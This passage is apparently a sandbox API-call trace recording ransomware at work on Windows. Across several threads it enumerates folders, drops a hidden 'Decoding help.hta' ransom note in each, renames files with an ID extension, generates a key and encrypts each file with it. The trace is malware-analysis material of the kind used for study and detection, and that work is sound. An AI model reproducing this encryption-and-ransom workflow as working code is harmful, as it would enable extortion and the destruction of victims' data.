lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.410] FindNextFileW (in: hFindFile=0x10fbcad8, lpFindFileData=0x20b1fd30 | out: lpFindFileData=0x20b1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.410] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.410] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.410] FindNextFileW (in: hFindFile=0x10fbcad8, lpFindFileData=0x20b1fd30 | out: lpFindFileData=0x20b1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="auxpad", cAlternateFileName="")) returned 1 [0059.410] lstrcmpW (lpString1=".", lpString2="auxpad") returned -1 [0059.410] lstrcmpW (lpString1="..", lpString2="auxpad") returned -1 [0059.410] lstrcmpiW (lpString1="windows", lpString2="auxpad") returned 1 [0059.411] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*.*" [0059.411] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*.*") returned 72 [0059.411] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\", lpString2="auxpad" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad" [0059.411] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\*.*" [0059.411] GlobalMemoryStatus (in: lpBuffer=0x20b1fd10 | out: lpBuffer=0x20b1fd10) [0059.411] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10afe178, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xdd0 [0059.411] CloseHandle (hObject=0xdd0) returned 1 [0059.412] FindNextFileW (in: hFindFile=0x10fbcad8, lpFindFileData=0x20b1fd30 | out: lpFindFileData=0x20b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f2b1a99, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f2b1a99, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f2b1a99, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd4, dwReserved0=0x0, dwReserved1=0x0, cFileName="auxpad.xml", cAlternateFileName="")) returned 1 [0059.412] lstrcpyW (in: lpString1=0x2ab11098, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*.*" [0059.412] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*.*") returned 72 [0059.412] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\Decoding help.hta" [0059.412] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\decoding help.hta")) returned 0xffffffff [0059.412] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4bc [0060.668] WriteFile (in: hFile=0x4bc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x20b1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x20b1fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.669] CloseHandle (hObject=0x4bc) returned 1 [0060.669] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0060.883] lstrcmpiW (lpString1="Decoding help.hta", lpString2="auxpad.xml") returned 1 [0060.883] lstrlenW (lpString="auxpad.xml") returned 10 [0060.883] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*.*" [0060.883] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*.*") returned 72 [0060.883] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\", lpString2="auxpad.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" [0060.883] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" [0060.883] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0060.883] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.883] FindNextFileW (in: hFindFile=0x10fbcad8, lpFindFileData=0x20b1fd30 | out: lpFindFileData=0x20b1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="keypad", cAlternateFileName="")) returned 1 [0060.883] lstrcmpW (lpString1=".", lpString2="keypad") returned -1 [0060.883] lstrcmpW (lpString1="..", lpString2="keypad") returned -1 [0060.883] lstrcmpiW (lpString1="windows", lpString2="keypad") returned 1 [0060.884] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*.*" [0060.884] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*.*") returned 72 [0060.884] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\", lpString2="keypad" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad" [0060.884] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\*.*" [0060.884] GlobalMemoryStatus (in: lpBuffer=0x20b1fd10 | out: lpBuffer=0x20b1fd10) [0060.884] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10850388, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x778 [0064.502] CloseHandle (hObject=0x778) returned 1 [0064.502] FindNextFileW (in: hFindFile=0x10fbcad8, lpFindFileData=0x20b1fd30 | out: lpFindFileData=0x20b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f47ab01, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f47ab01, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f47ab01, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="keypad.xml", cAlternateFileName="")) returned 1 Thread: id = 757 os_tid = 0x6e4 [0054.495] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\*.*", lpFindFileData=0x20c5fd30 | out: lpFindFileData=0x20c5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671af0 [0054.495] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.495] FindNextFileW (in: hFindFile=0x671af0, lpFindFileData=0x20c5fd30 | out: lpFindFileData=0x20c5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.495] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.495] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.495] FindNextFileW (in: hFindFile=0x671af0, lpFindFileData=0x20c5fd30 | out: lpFindFileData=0x20c5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0054.495] FindClose (in: hFindFile=0x671af0 | out: hFindFile=0x671af0) returned 1 Thread: id = 758 os_tid = 0x660 [0054.496] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\*.*", lpFindFileData=0x2069fd30 | out: lpFindFileData=0x2069fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5a6660, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5a6660, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db278 [0056.851] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.851] FindNextFileW (in: hFindFile=0x5db278, lpFindFileData=0x2069fd30 | out: lpFindFileData=0x2069fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5a6660, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5a6660, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.851] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.851] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.851] FindNextFileW (in: hFindFile=0x5db278, lpFindFileData=0x2069fd30 | out: lpFindFileData=0x2069fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d5a6660, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 1 [0056.851] lstrcpyW (in: lpString1=0x11314248, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\*.*" [0056.851] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\*.*") returned 63 [0056.851] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\Decoding help.hta" [0056.851] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\it_it\\decoding help.hta")) returned 0xffffffff [0056.851] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\it_it\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb54 [0058.347] WriteFile (in: hFile=0xb54, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2069fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2069fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.348] CloseHandle (hObject=0xb54) returned 1 [0058.348] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.349] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Reader_10.0.helpcfg") returned -1 [0058.349] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0058.349] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\*.*" [0058.349] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\*.*") returned 63 [0058.349] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\", lpString2="Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\Reader_10.0.helpcfg" [0058.349] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\Reader_10.0.helpcfg" [0058.349] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\Reader_10.0.helpcfg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" [0058.349] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\it_it\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\it_it\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.349] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\it_it\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb54 [0058.349] CreateFileMappingA (hFile=0xb54, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xb58 [0058.350] CryptAcquireContextA (in: phProv=0x2069fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2069fcec*=0x2aac5890) returned 1 [0060.204] CryptGenKey (in: hProv=0x2aac5890, Algid=0x6610, dwFlags=0x1, phKey=0x2069fce8 | out: phKey=0x2069fce8*=0x5fca320) returned 1 [0060.204] CryptExportKey (in: hKey=0x5fca320, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2069fbe4, pdwDataLen=0x2069fce4 | out: pbData=0x2069fbe4*, pdwDataLen=0x2069fce4*=0x2c) returned 1 [0060.204] MapViewOfFile (hFileMappingObject=0xb58, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x39c0000 [0064.213] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2069fbe4*, pdwDataLen=0x2069fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x2069fbe4*, pdwDataLen=0x2069fcf8*=0x100) returned 1 [0064.213] CryptEncrypt (in: hKey=0x5fca320, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x39c0000*, pdwDataLen=0x2069fce4*=0x140, dwBufLen=0x140 | out: pbData=0x39c0000*, pdwDataLen=0x2069fce4*=0x140) returned 1 [0064.213] UnmapViewOfFile (lpBaseAddress=0x39c0000) returned 1 [0064.216] CloseHandle (hObject=0xb58) returned 1 [0064.216] CryptDestroyKey (hKey=0x5fca320) returned 1 [0064.216] CryptReleaseContext (hProv=0x2aac5890, dwFlags=0x0) returned 1 [0064.216] SetFilePointerEx (in: hFile=0xb54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.216] WriteFile (hFile=0xb54, lpBuffer=0x2069fbe4, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2069fcf8, lpOverlapped=0x0) Thread: id = 759 os_tid = 0x998 [0054.496] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*", lpFindFileData=0x20d9fd30 | out: lpFindFileData=0x20d9fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfc65d150, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe5bc2f0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xe5bc2f0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7d90 [0055.676] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.676] FindNextFileW (in: hFindFile=0x5d7d90, lpFindFileData=0x20d9fd30 | out: lpFindFileData=0x20d9fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfc65d150, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe5bc2f0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xe5bc2f0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.676] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0055.676] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.676] FindNextFileW (in: hFindFile=0x5d7d90, lpFindFileData=0x20d9fd30 | out: lpFindFileData=0x20d9fd30*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xfc767af0, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xfc767af0, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xfc767af0, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x2f, dwReserved0=0x0, dwReserved1=0x0, cFileName="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", cAlternateFileName="6D14E4~1")) returned 1 [0055.770] lstrcpyW (in: lpString1=0x2a960ad8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*" [0055.770] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*") returned 56 [0055.770] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\Decoding help.hta" [0055.770] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\decoding help.hta")) returned 0xffffffff [0055.770] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0060.813] WriteFile (in: hFile=0x31c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x20d9fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x20d9fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.814] CloseHandle (hObject=0x31c) returned 1 [0060.814] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0060.895] lstrcmpiW (lpString1="Decoding help.hta", lpString2="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 1 [0060.895] lstrlenW (lpString="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 69 [0060.895] lstrcmpiW (lpString1="[ID]", lpString2="e53f") returned -1 [0060.895] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*" [0060.895] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*") returned 56 [0060.895] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\", 